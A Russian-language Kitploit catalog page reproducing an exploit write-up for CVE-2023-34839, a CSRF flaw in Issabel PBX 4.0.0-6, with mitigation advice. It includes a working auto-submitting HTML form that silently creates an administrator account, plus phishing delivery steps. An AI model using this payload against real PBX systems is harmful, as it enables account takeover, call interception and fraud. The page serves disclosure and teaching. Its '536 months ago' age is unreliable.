Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2023-34839 — CVE-2023-34839 — это уязвимость межсайтовой подделки запросов (CSRF), обнаруженная в Issabel PBX версии 4.0.0-6, широко используемой открытой платформе унифицированных коммуникаций. | Kitploit
Инструменты/GitHubGitHub/sahiloj/cve-2023-34839
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеСтатьи и ИсследованияОбучение и Образование
GitHubsahiloj/cve-2023-34839

CVE-2023-34839

CVE-2023-34839 — это уязвимость межсайтовой подделки запросов (CSRF), обнаруженная в Issabel PBX версии 4.0.0-6, широко используемой открытой платформе унифицированных коммуникаций.

Репозиторий
536 месяцев назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2023-34839 — Issabel PBX 4.0.0-6: CSRF для повышения привилегий

CVE Severity CVSS Affected Version


Содержание

  • Обзор
  • Детали уязвимости
  • Затронутое ПО
  • Оценка CVSS
  • Сценарий атаки
  • Proof of Concept (PoC)
  • Шаги по воспроизведению
  • Воздействие
  • Устранение уязвимости
  • Ссылки
  • Отказ от ответственности

Обзор

CVE-2023-34839 — это уязвимость, связанная с межсайтовой подделкой запроса (Cross-Site Request Forgery, CSRF), обнаруженная в Issabel PBX версии 4.0.0-6 — широко используемой платформе унифицированных коммуникаций с открытым исходным кодом. Уязвимость находится в конечной точке управления пользователями и позволяет удалённому неаутентифицированному злоумышленнику незаметно создать новую учётную запись администратора, обманом заставив аутентифицированного администратора посетить специально созданную веб-страницу.


Детали уязвимости

В Issabel PBX 4.0.0-6 не реализована защита от CSRF (например, токены синхронизации, атрибуты cookie SameSite или проверка заголовков Origin / Referer) в конечной точке создания пользователя:

root@kitploit:~
POST /index.php?menu=userlist&action=new

Поскольку приложение полагается исключительно на сессионные cookie для аутентификации и не выполняет проверку запросов, изменяющих состояние, поддельный POST-запрос, отправленный из любого источника, будет принят и обработан с полными привилегиями сессии вошедшего в систему администратора.

Корневая причина: отсутствие проверки анти-CSRF-токенов в изменяющих состояние административных конечных точках.

Класс уязвимости: CWE-352 — межсайтовая подделка запроса (CSRF)


Затронутое ПО

ПОВерсияСтатус
Issabel PBX4.0.0-6Уязвима ✔
  • Сайт вендора: https://www.issabel.org/
  • Исходный код: https://github.com/IssabelFoundation/issabelPBX

Оценка CVSS


Сценарий атаки

Злоумышленник может использовать эту уязвимость, выполнив следующие основные шаги:

  1. Создайте вредоносную HTML-страницу, содержащую скрытую форму, нацеленную на конечную точку создания пользователя Issabel PBX, с контролируемыми злоумышленником значениями (имя пользователя, пароль, группа = administrator).
  2. Разместите вредоносную страницу на сервере или отправьте её целевому администратору через фишинговое письмо, сообщение в чате или любой другой вектор социальной инженерии.
  3. Дождитесь, пока администратор откроет ссылку, имея активную аутентифицированную сессию в приложении Issabel PBX.
  4. Браузер автоматически отправит форму, используя существующую сессионную cookie жертвы, в результате чего приложение незаметно создаст новую учётную запись администратора.
  5. Злоумышленник войдёт в систему с вновь созданными учётными данными и получит полный доступ администратора к системе PBX, включая маршрутизацию вызовов, записи разговоров, настройку SIP-транков и все системные параметры.

От жертвы не требуется никаких действий, кроме однократного посещения страницы.


Proof of Concept (PoC)

⚠️ Только для образовательных целей и авторизованного тестирования.
Замените localhost на имя хоста или IP-адрес целевого экземпляра Issabel PBX.
Если тестирование выполняется через конечную точку https:// с самозаверяющим сертификатом, сначала необходимо в том же браузере перейти по целевому URL и принять предупреждение о сертификате; в противном случае браузер заблокирует отправку формы с другого источника.

root@kitploit:~
<html>
  <!-- CSRF Exploit — CVE-2023-34839 -->
  <body>
    <form action="https://localhost/index.php?menu=userlist&action=new" method="POST">
      <input type="hidden" name="save"             value="Save" />
      <input type="hidden" name="name"             value="CSRF" />
      <input type="hidden" name="description"      value="CSRF Test Account" />
      <input type="hidden" name="password1"        value="Test@123" />
      <input type="hidden" name="password2"        value="Test@123" />
      <input type="hidden" name="group"            value="1" />   <!-- 1 = Administrator -->
      <input type="hidden" name="extension"        value="" />
      <input type="hidden" name="webmailuser"      value="" />
      <input type="hidden" name="webmaildomain"    value="" />
      <input type="hidden" name="webmailpassword1" value="" />
      <input type="hidden" name="id_user"          value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>

Файл эксплойта также доступен в этом репозитории: CSRF Exploit.html


Шаги по воспроизведению

Предварительные требования

  • Запущенный экземпляр Issabel PBX 4.0.0-6.
  • Учётная запись администратора с активной сессией в браузере.
  • Браузер на том же компьютере, где активна сессия администратора.

Шаг 1 — Вход в Issabel PBX как администратор

Перейдите в веб-интерфейс Issabel PBX и войдите, используя учётные данные администратора.

Issabel PBX Login


Шаг 2 — Подготовка CSRF-эксплойта

Скопируйте приведённый выше HTML-код PoC и сохраните его как файл .html, заменив localhost на фактическое имя хоста или IP-адрес целевого экземпляра Issabel.

Эксплойт использует скрытые поля формы для незаметной отправки POST-запроса на создание нового пользователя в приложение. При загрузке страницы встроенный JavaScript немедленно отправляет форму без каких-либо видимых действий пользователя.

CSRF Exploit HTML


Шаг 3 — Открытие эксплойта в том же браузере

Откройте сохранённый HTML-файл в том же браузере (в новой вкладке), пока сессия администратора ещё активна. Форма будет автоматически отправлена сразу после загрузки страницы.


Шаг 4 — Проверка создания новой учётной записи администратора

Вернитесь в панель User Management (управление пользователями) Issabel PBX. Будет создана новая учётная запись (в данном PoC — с именем CSRF) с полными привилегиями администратора — без каких-либо дополнительных действий, кроме открытия страницы с эксплойтом.

New Admin User Created


Воздействие

Успешная эксплуатация CVE-2023-34839 позволяет злоумышленнику:

  • Создавать поддельные учётные записи администратора в системе PBX, обеспечивая постоянный доступ с полными привилегиями.
  • Изменять маршрутизацию вызовов и SIP-транки, что позволяет прослушивать разговоры или совершать телефонное мошенничество.
  • Получать доступ к записям голосовой почты и детализированным записям вызовов (CDR), что приводит к раскрытию конфиденциальной информации.
  • Блокировать легитимных администраторов, изменяя пароли или удаляя существующие учётные записи.
  • Нарушать связь, изменяя или удаляя конфигурацию PBX.

Поскольку поддельная учётная запись сохраняется даже после завершения сессии жертвы, злоумышленник сохраняет доступ на неопределённый срок, пока учётная запись не будет обнаружена и удалена.


Устранение уязвимости

Администраторам и разработчикам Issabel PBX следует применить следующие меры:

  1. Внедрить анти-CSRF-токены: генерируйте уникальный непредсказуемый токен, привязанный к сессии, для каждой формы, изменяющей состояние. Проверяйте токен на стороне сервера перед обработкой любого POST-запроса.

  2. Установить SameSite=Strict или SameSite=Lax для сессионных cookie: это указывает браузерам не отправлять cookie в межсайтовых запросах, эффективно предотвращая классические CSRF-атаки в современных браузерах.

  3. Проверять заголовки Origin и Referer: отклоняйте запросы, заголовок Origin или Referer которых не соответствует ожидаемому домену приложения.

  4. Требовать повторную аутентификацию для критически важных действий: запрашивайте у администратора текущий пароль перед разрешением создания новых учётных записей уровня администратора.

  5. Устанавливать последние исправления безопасности: следите за страницей релизов Issabel и официальным репозиторием на предмет исправлений, устраняющих данную CVE.


Ссылки

  • NVD — CVE-2023-34839
  • OWASP — Cross-Site Request Forgery (CSRF)
  • CWE-352: Cross-Site Request Forgery
  • Официальный сайт Issabel
  • IssabelFoundation/issabelPBX на GitHub

Отказ от ответственности

Этот репозиторий предназначен строго для образовательных целей и авторизованных исследований в области безопасности. Информация и код proof-of-concept, представленные здесь, должны использоваться только против систем, которыми вы владеете или на тестирование которых имеете явное письменное разрешение. Несанкционированное использование этого эксплойта против систем, которые вам не принадлежат, противозаконно и может повлечь уголовное преследование. Автор не несёт ответственности за любое неправомерное использование информации, содержащейся в этом репозитории.

Скачать инструмент
ПолеЗначение
CVE IDCVE-2023-34839
Дата23 июня 2023
ИсследовательSahil Ojha
ВендорIssabel
ПродуктIssabel PBX
Версия4.0.0-6
Протестировано наWindows
МетрикаЗначение
Вектор CVSS v3.1AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H
Базовый балл8.8 (высокий)
Вектор атакиСеть
Сложность атакиНизкая
Требуемые привилегииНе требуются
Взаимодействие с пользователемТребуется (посещение администратором)
Область действияНе изменяется
КонфиденциальностьВысокая
ЦелостностьВысокая
ДоступностьВысокая